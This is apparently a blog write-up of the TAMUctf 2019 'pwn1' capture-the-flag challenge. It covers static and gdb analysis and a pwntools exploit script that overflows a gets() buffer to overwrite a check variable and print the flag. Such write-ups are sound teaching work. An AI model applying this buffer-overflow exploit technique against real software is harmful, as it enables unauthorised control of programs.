Security CTF - Nightmare Module 04 - tamu19_pwn1
Introduction
We are continuing working through the Capture the Flag(CTF) challenges collected in the Nightmare repo.
Today we tackle Module 04’s tamu19_pwn1 challenge. This was part of Texas A&M University’s Cybersecurity Center TAMUctf 2019 event.
For more information on what security CTF is all about check out this intro video
Tools
- Linux file command
- checksec utility (pwntools implementation of checksec.sh)
- Ghidra disassembler/decompiler
- pwntools scripting framework
- gdb debugger w/GEF extension
tamu19_pwn1
Our target for this challenge is a program named pwn1.
We begin by gathering some information about the file.
file command
1ctf@ctf2204:tamu19_pwn1$ file pwn1
2pwn1: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not strippedWe are looking at a 32-bit x86 ELF executable, dynamically linked whose symbol information has not been stripped.
Note that If you’re following along on a modern 64-bit Linux, you may need to enable the 32-bit architecture in order to run this binary.
checksec
1ctf@ctf2204:tamu19_pwn1$ checksec pwn1
2[*] '/home/ctf/projects/nightmare/modules/04-bof_variable/tamu19_pwn1/pwn1'
3 Arch: i386-32-little
4 RELRO: Full RELRO
5 Stack: No canary found
6 NX: NX enabled
7 PIE: PIE enabledIn terms of protections enabled on this binary there is no stack canary, non executable stack/DEP is enabled and the program is compiled as a position independent executable.
However as we will see below none of these really impact our solution to this challenge. But it’s good to get familiar with identifying the protections that are enabled.
Sample Execution
1ctf@ctf2204:tamu19_pwn1$ ./pwn1
2Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
3What... is your name?
4ASDF
5I don't know that! Auuuuuuuugh!
6ctf@ctf2204:tamu19_pwn1$When run the program prints some Monty Python inspired intro text and then proceeds to prompt the user for input(the ‘ASDF’ above)
No indication is given of the expected answers so we will need to analyze the executable to gather that information.
Note that when examining a binary from an untrusted soruce, suspected malware for example, we need to be very cautious about running the executable. It should be done in an isolated and disposable environment. For the purposes of this writeup all execution of the target executable is done in a disposable VM.
strings command
1ctf@ctf2204:tamu19_pwn1$ strings pwn1
2/lib/ld-linux.so.2
3libc.so.6
4_IO_stdin_used
5exit
6
7... SNIP FOR BREVITY ...
8
9Right. Off you go.
10flag.txt
11Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
12What... is your name?
13Sir Lancelot of Camelot
14I don't know that! Auuuuuuuugh!
15What... is your quest?
16To seek the Holy Grail.
17What... is my secret?
18;*2$"
19GCC: (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0
20
21... SNIP FOR BREVITY ...The strings command allows us to get some quick insights into the program by dumping all sequences of human-readable characters (longer than a certain threshold) contained within the binary.
It’s not infallible but it’s a good starting point for analysis. Note that not everything it produces is necessarily strings output to the user in the program. As you can see above it has library names, compiler version info, etc… You need to sift through for the stuff that seems contextually relevant.
In the highlighted block in the command output above we see some strings we recognize from the program execution. Along with several other strings we didn’t see in the sample execution.
“Sir Lancelot of Camelot” and “To seek the Holy Grail.” look like pretty good answers to the first two questions.
Sample Execution 2 - Testing Answers
1ctf@ctf2204:tamu19_pwn1$ ./pwn1
2Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
3What... is your name?
4Sir Lancelot of Camelot
5What... is your quest?
6To seek the Holy Grail.
7What... is my secret?
8ASDF
9I don't know that! Auuuuuuuugh!We’ve successfully answered the first two questions using the information gleaned from the strings command. Hurray for low hanging fruit.
But we don’t know the secret.
Let’s crack open the executable in Ghidra and examine what the code is actually doing.
Ghidra Decompiler Listing - main()
1undefined4 main(void)
2{
3 int stringCompareResult;
4 char inputBuffer [43];
5 uint checkValue;
6 undefined4 local_14;
7 undefined *local_10;
8
9 local_10 = &stack0x00000004;
10 setvbuf(_stdout,(char *)0x2,0,0);
11 local_14 = 2;
12
13 checkValue = 0;
14
15 puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");
16 puts("What... is your name?");
17
18 fgets(inputBuffer,0x2b,_stdin);
19
20 stringCompareResult = strcmp(inputBuffer,"Sir Lancelot of Camelot\n");
21 if (stringCompareResult != 0) {
22 puts("I don\'t know that! Auuuuuuuugh!");
23 /* WARNING: Subroutine does not return */
24 exit(0);
25 }
26
27 puts("What... is your quest?");
28
29 fgets(inputBuffer,0x2b,_stdin);
30
31 stringCompareResult = strcmp(inputBuffer,"To seek the Holy Grail.\n");
32 if (stringCompareResult != 0) {
33 puts("I don\'t know that! Auuuuuuuugh!");
34 /* WARNING: Subroutine does not return */
35 exit(0);
36 }
37
38 puts("What... is my secret?");
39
40 gets(inputBuffer);
41 if (checkValue == 0xdea110c8) {
42 print_flag();
43 }
44 else {
45 puts("I don\'t know that! Auuuuuuuugh!");
46 }
47
48 return 0;
49}Pretty straighforward.
The puts() function is used throughout main() to output text to the console. The intro text is displayed and then the program proceeds to sequentially prompt the user with a question and then read their response from stdin into a stack allocated input buffer.. The first two questions use fgets() to read input while the third question uses gets().
After each of the first two questions & answers the user’s input is compared against the hardcoded answer string using strcmp(). The comparison result is stored in a local variable and used in an if statement to branch on whether the user successfully answered the question or not. If yes, execution continues sequentially. If no, the failure message is displayed and the program exits immediately.
The third question is different. After reading the user’s answer into the input buffer, an if statement checks a different local variable, unrelated to the user’s input, for equality to the hardcoded hex value 0xdea110c8. If the local variable is equal to 0xdea110c8 the function print_flag() is called. If not the failure message is printed and execution flows through to main()’s return statement.
Ghidra Decompiler Listing - print_flag()
1void print_flag(void)
2{
3 FILE *__fp;
4 int iVar1;
5
6 puts("Right. Off you go.");
7 __fp = fopen("flag.txt","r");
8 while( true ) {
9 iVar1 = _IO_getc(__fp);
10 if ((char)iVar1 == -1) break;
11 putchar((int)(char)iVar1);
12 }
13 putchar(10);
14 return;
15}The function will simply open the file “flag.txt”, read it character by character and display the characters to stdout. Followed by a line feed.
Note that the flag.txt file is in the same directory as the pwn1 executable. When working through this on your local machine you could clearly just open this file to find the flag. That defeats the purpose of trying to learn about this stuff. And in real CTF events you’re likely connecting to remote hosts and interacting with the programs remotely.
Analysis
We have several reads of input into a stack allocated variable.
On main() Line 18 and Line 29 above fgets() writes 42 bytes(count - 1) into the inputBuffer variable’s memory and then appends a string null terminator byte to the buffer for a total of 43 bytes. inputBuffer is declared as 43 bytes long (Line 4) so these are correctly bounded memory writes.
On Line 40 gets() writes an unlimited number of bytes into inputBuffer. However many characters the user provides as an answer to the third question … are written to memory starting at inputBuffer’s address. If the user provides more than 43 characters then we’re overflowing beyond the memory intended for input and into other stack memory.
We can examine this happening with a debugger.
Dynamic Analysis with GDB
1ctf@ctf2204:tamu19_pwn1$ gdb ./pwn1
2Reading symbols from ./pwn1...
3(No debugging symbols found in ./pwn1)
4
5gef➤ disas *main+298, *main+361
6Dump of assembler code from 0x565558a3 to 0x565558e2:
7 0x565558a3 <main+298>: sub esp,0xc
8 0x565558a6 <main+301>: lea eax,[ebp-0x3b]
9 0x565558a9 <main+304>: push eax
10 0x565558aa <main+305>: call 0x56555520 <gets@plt>
11 0x565558af <main+310>: add esp,0x10
12 0x565558b2 <main+313>: cmp DWORD PTR [ebp-0x10],0xdea110c8
13 0x565558b9 <main+320>: jne 0x565558c2 <main+329>
14 0x565558bb <main+322>: call 0x565556fd <print_flag>
15 0x565558c0 <main+327>: jmp 0x565558d4 <main+347>
16 0x565558c2 <main+329>: sub esp,0xc
17 0x565558c5 <main+332>: lea eax,[ebx-0x1584]
18 0x565558cb <main+338>: push eax
19 0x565558cc <main+339>: call 0x56555550 <puts@plt>
20 0x565558d1 <main+344>: add esp,0x10
21 0x565558d4 <main+347>: mov eax,0x0
22 0x565558d9 <main+352>: lea esp,[ebp-0x8]
23 0x565558dc <main+355>: pop ecx
24 0x565558dd <main+356>: pop ebx
25 0x565558de <main+357>: pop ebp
26 0x565558df <main+358>: lea esp,[ecx-0x4]
27End of assembler dump.
28
29gef➤ b *main+310
30Breakpoint 1 at 0x8af
31
32gef➤ x/xw $ebp-0x10
330xffffd458: 0x00000000
34
35gef➤ rAbove we launch gdb and get oriented to investigate the pwn1 executable with the debugger.
Line 1: Launch gdb and open the pwn1 executable
Line 5: Display the disassembly of main(), showing instructions between address main+298 and main+361. This segment of main() contains the gets() call used to get user input for the “What…is my secret?” question.
Line 10: We see the CALL instruction to gets() at address main+305 of our executable. Note that just before the CALL instruction, at main+304, the eax variable is pushed onto the stack. In x86 32bit Linux function arguments are passed on the stack. We can infer that this eax value at the top of the stack when CALL occurs is gets() first argument, ie. the location of the input buffer to read input into.
Line 12: The second instruction after the gets() call is the comparison between the checkValue local variable we saw in the decompiler output earlier, and the hard-coded value 0xdea110c8. Notice that in the assembly code the local checkValue variable is simply referred to by ebp-0x10. This is an offset relative to the base frame pointer of the current stack frame and is a common notation for referencing local variables. The CMP instruction compares the values and sets flags used in the subsequent JNE jump not equal instruction.
Line 29: Here we set a breakpoint just after the call to gets() has completed. This will allow us to examine where the input we have provided has landed in memory and confirm that we will be able to overwrite the variable checkValue.
Line 32: Check what ebp-0x10 actually resolves to as an absolute address in the process memory. This is where the value of the checkValue variable is stored. Recall that this variable is used in the if statement to decide whether the print_flag() function will be called. Note that this address represented by ebp-0x10 will not always be the same value on different machines, and even on different runs of the same program on the same machine. This is due to the Address Space Layout Randomization security feature (ASLR). The checkValue variable will always be located at ebp-0x10 … but the actual address represented by that offset from the ebp register can differ.
Line 35: With our breakpoint configured we now run the program.
The program will execute normally under GDB and we will be prompted with the same 3 questions as the sample executions shown above. To reach the “What…is my secret?” question we must answer the first two questions correctly. For the third question, the one with a buffer overflow vulnerability due to it’s use of gets(), we enter a sequence of 43 “A” characters followed by 4 “B” characters. This should entirely fill up the input buffer memory with “A” … and the subsequent 4 “B” characters should overwrite the memory used by the checkValue variable.
In the listing below the program has just halted at the breakpoint on main+310 just after the gets() call has completed and written our input to memory.
1gef➤ registers $eip $esp $ebp $eax
2$eax : 0xffffd42d → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
3$esp : 0xffffd410 → 0xffffd42d → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
4$ebp : 0xffffd468 → 0xf7ffd020 → 0xf7ffda40 → 0x56555000 → jg 0x56555047
5$eip : 0x565558af → <main+310> add esp, 0x10
6
7gef➤ hexdump dword $esp --size 24
80xffffd410│+0x0000 0xffffd42d
90xffffd414│+0x0004 0x56555a63
100xffffd418│+0x0008 0xf7fad620
110xffffd41c│+0x000c 0x00000000
120xffffd420│+0x0010 0x00000000
130xffffd424│+0x0014 0x00000000
140xffffd428│+0x0018 0x01000000
150xffffd42c│+0x001c 0x41414109
160xffffd430│+0x0020 0x41414141
170xffffd434│+0x0024 0x41414141
180xffffd438│+0x0028 0x41414141
190xffffd43c│+0x002c 0x41414141
200xffffd440│+0x0030 0x41414141
210xffffd444│+0x0034 0x41414141
220xffffd448│+0x0038 0x41414141
230xffffd44c│+0x003c 0x41414141
240xffffd450│+0x0040 0x41414141
250xffffd454│+0x0044 0x41414141
260xffffd458│+0x0048 0x42424242
270xffffd45c│+0x004c 0x00000000
280xffffd460│+0x0050 0xffffd480
290xffffd464│+0x0054 0xf7fad000
300xffffd468│+0x0058 0xf7ffd020
310xffffd46c│+0x005c 0xf7da8519
32
33gef➤ hexdump byte --size 0x30 0xffffd42d
340xffffd42d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
350xffffd43d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
360xffffd44d 41 41 41 41 41 41 41 41 41 41 41 42 42 42 42 00 AAAAAAAAAAABBBB.
37
38gef➤ x/xw $ebp-0x10
390xffffd458: 0x42424242Line 1: We display a few of the CPU registers to orient ourselves. eax still contains the value that was pushed to the stack prior to the gets() call (0xffffd42d). esp is the head of the stack memory (0xffffd410) and note that stored at that address … is the value of eax (0xffffd42d). This was pushed to the stack immediately before the gets() call, and it is the address of the inputBuffer variable. This is where our input is written. ebp is our base frame pointer. The actual value here isn’t super important, but remember we use the ebp value, along with an offset, to calculate the address of the checkValue variable. eip is the instruction pointer and tells us what instruction we are currently halted on. This is the add instruction right after the CALL to gets().
Line 7: We examine the process’s stack memory. Starting at the address stored in esp we display 24 doube words (i.e. 4 byte values). Line 8 shows address 0xffffd410 which is the current head of the stack memory. Since we’re halted right after the gets() call we know that the value stored here is the argument to the gets() call. So the address of inputBuffer, which we can see is 0xffffd42d. If we check out the memory there we should see the bytes that represent the string we entered as a response to the third question.
Lines 15-26: Here we see the actual memory allocated for inputBuffer on the stack. Line 15 begins at address 0xffffd42c, which is one byte away from inputBuffer’s start. In the right-most column of the hexdump we see a long sequence of bytes with the value 41. Hex 41 is the ASCII code for the character ‘A’, which we provided as the answer to the third question. And down at the end of the highlighted block Line 26 is memory address 0xffffd458. Recall from the previous listing that our checkValue variable, refered to in assembly code as ebp-0x10, is stored at 0xffffd458. And here we see that the value at 0xffffd458 is now 0x42424242. Hex 42 is the value of the ASCII character ‘B’. This confirms that we have succesfully overwritten the checkValue variable with our B characters.
Line 33: We look at 48 bytes starting at the beginning of inputBuffer memory (0xffffd42d). In this view we see the actual ASCII characters in the right most column. We see our string of A’s followed by four B’s. This reconfirms what we saw in the previous hex dump.
Line 38: As we did in the prior listing, before hitting our breakpoint, we examine the memory at ebp-0x10. This confirms that it now holds the value 0x42424242. So when the if statement determining whether to call print_flag() occurs it the value 0x42424242 will be compared to 0xdea110c8. **The key point here is that we have confirmed that we can control the value of checkValue with our input as a result of the buffer overflow. All that remains to do is planting the specific value we need (0xdea110c8) there instead of a series of test characters.
Exploitation
At this stage we’ve located the vulnerability and figured out how to exploit it.
Using pwntools we can wrap it all together into a simple, automated script to drive input to the pwn1 executable, exploit it and display the flag.
I’ve commented the script below but if anything is unclear I’d recommend looking through the pwntools documentation.
1#!/usr/bin/env python3
2
3from pwn import *
4import os
5
6# Some pwntools framework configuration variables
7context.terminal = ["tmux", "new-window"]
8context.arch = 'i386'
9context.bits = '32'
10context.os = 'linux'
11
12# Correct answers to first two questions
13CORRECT_1ST_ANSWER = b"Sir Lancelot of Camelot"
14CORRECT_2ND_ANSWER = b"To seek the Holy Grail."
15
16# The value we want to set checkValue to in pwn1's process memory
17CHECKED_VALUE = 0xdea110c8
18
19# Set up our input payload for the third question
20padding = b"A"*43 # 43 'junk' bytes to fill up the inputBuffer memory
21packed_payload = p32(CHECKED_VALUE) # the value we want to plant
22exploit_payload = padding + packed_payload
23
24log.info("pwntools script's PID: {}".format(os.getpid()))
25
26# start the process under gdb for debugging
27"""
28io = gdb.debug("./pwn1", gdbscript='''
29 set follow-fork-mode child
30 b *main+313
31 continue
32 ''')
33"""
34
35# execute process directly
36# interact with it's stdin/stdout programmatically using the returned
37# object
38io = process("./pwn1")
39
40log.info("pwn1 process stdout:")
41print(io.recv().decode())
42
43log.info("Sending Correct First Answer: \'{0}\'".format(CORRECT_1ST_ANSWER.decode()))
44io.sendline(CORRECT_1ST_ANSWER)
45
46log.info("pwn1 process stdout:")
47print(io.recv().decode())
48
49log.info("Sending Correct Second Answer: \'{0}\'".format(CORRECT_2ND_ANSWER.decode()))
50io.sendline(CORRECT_2ND_ANSWER)
51log.info("pwn1 process stdout:")
52print(io.recv().decode())
53
54log.info("Sending exploit payload...")
55io.sendline(exploit_payload)
56log.info("pwn1 process stdout:")
57print(io.recv().decode())
58
59io.interactive()And here is a sample run of the exploit script. At Lines 19-20 we see the output of the print_flag() function having been called rather than the failure message “I don’t know that! Auuuuuuuugh!” that we saw displayed in our sample runs of the program at the start of this post.
We’ve successfully altered the execution flow of the if statement to make the program call print_flag().
1ctf@ctf2204:tamu19_pwn1$ ./tamu19_pwn1_exploit.py
2[*] pwntools script's PID: 1881
3[x] Starting local process './pwn1'
4[+] Starting local process './pwn1': pid 1884
5[*] pwn1 process stdout:
6Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
7What... is your name?
8
9[*] Sending Correct First Answer: 'Sir Lancelot of Camelot'
10[*] pwn1 process stdout:
11What... is your quest?
12
13[*] Sending Correct Second Answer: 'To seek the Holy Grail.'
14[*] pwn1 process stdout:
15What... is my secret?
16
17[*] Sending exploit payload...
18[*] pwn1 process stdout:
19Right. Off you go.
20flag{g0ttem_b0yz}
21
22
23[*] Switching to interactive mode
24[*] Process './pwn1' stopped with exit code 0 (pid 1884)
25[*] Got EOF while reading in interactive
26$ q
27[*] Got EOF while sending in interactiveConclusion
This one is another very basic example of a buffer overflow. The pwn1 executable already contains the functionality we want (i.e. the print_flag() function) and an conditional statement to decide whether to execute that functionality. We are simply using our buffer overflow to alter the variable used in the conditional statement.
The root cause of the buffer overflow in this example is the use of gets() to read the user’s answer to the third question. gets() takes only one argument: a pointer to the memory where it will write the bytes. It does not permit specifying a maximum number of bytes to read. For this reason the fgets() function, as used in the first two questions, is considered a more secure option because it takes a second argument specifying how many bytes to read.
In more advanced cases we will not only use buffer overflows to control the values in process memory and redirect execution … but also to inject new functionality of our choosing (i.e. shellcode). But there will be obstacles to overcome along the way in the form of security protections like ASLR, DEP/NX, etc…
Stay tuned for that and more as I work through the Nightmare repo’s CTF examples.